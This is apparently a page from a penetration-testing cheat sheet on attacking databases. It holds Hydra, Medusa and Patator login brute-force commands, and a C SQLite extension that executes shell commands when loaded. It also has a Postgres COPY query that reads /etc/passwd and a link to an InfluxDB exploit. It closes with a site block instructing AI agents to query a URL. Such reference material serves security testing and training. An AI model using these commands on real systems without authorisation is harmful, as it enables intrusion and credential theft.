# Database

<picture><source srcset="https://user-images.githubusercontent.com/22857002/206203834-9f2272bc-019e-4898-bfbc-da0cef626d9f.svg#gh-dark-mode-only" media="(prefers-color-scheme: dark)"><img src="https://user-images.githubusercontent.com/22857002/206203839-0a4a7b2b-29fb-4670-b33b-c0c63b6c89a9.svg#gh-light-mode-only" alt=""></picture>

***

* [Dynamodb](#dynamodb)
* [Influx DB](#influx-db)
* [Mysql](#mysql)
* [Postgres](#postgres)
* [SQLite](#sqlite)

## Bruteforce

#### Patator

```bash
patator pgsql_login user=user password=FILE1 0=/usr/share/wordlists/rockyou.txt  host=ip -x ignore:fgrep='failed'
```

#### Medusa

```bash
medusa -h ip -u user -P pass.txt -M mysql -n 22
```

#### Hydra

```bash
hydra -l user -P pass.txt ip mysql
```

## MySql

> Port: 3306

#### Connect to mysql

```bash
mysql -h localhost -u myname -p
```

#### Show Info

```
SHOW DATABASES;
use db_name
SHOW TABLES;
```

#### Select

```sql
SELECT * FROM table_name
```

## SQLite

#### Open

```bash
sqlite3 database.sqlite3
```

or open in vs code

#### Show info

```
.databases
.tables
```

#### Load extension

> Sometimes you have to load extension to get some privileges Note: the function name need to be `sqlite3_<extension_name>_init`

```c
// gcc -s -g -fPIC -shared my_extension.c -o my_extension.so
#include <stdlib.h>
int sqlite3_my_extension_init(){
    system("id");
    return 0;
}
```

After that you can load the extension on sqlite with:

```sql
load_extension("my_extension.so");
```

## Postgres

> Port: 5432

#### Wordlist Default Credentials

```path
/usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt
/usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt
```

#### Connect

```bash
psql -h ip -U username -d database -W
```

#### Show infos

```
\l # list all databases
\dt # list all tables
```

#### Read File

```sql
create table hack(file TEXT);
COPY hack FROM '/etc/passwd';
select * from hack;
```

* [PostgreSQL Pentesting](https://medium.com/@lordhorcrux_/ultimate-guide-postgresql-pentesting-989055d5551e)

## Influx DB

[CVE-2019-20933 Influxdb](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)

```
> show databases # to display databases
> show field keys # field keys (like columns in sql)
> show measurements # to display measurements (like tables in sql)
{
  ...
  "results": [
    "values": [
        [
            <strong>"foo"</strong>
        ]
    ]
  ...
}
> select * from "foo" # display all content of measurments (table) 'foo' (keep the doubles quotes)
```

## Dynamodb

See [this page](/hacksheet/wiki/cloud.md)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://sawyer-flink.gitbook.io/hacksheet/wiki/database.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.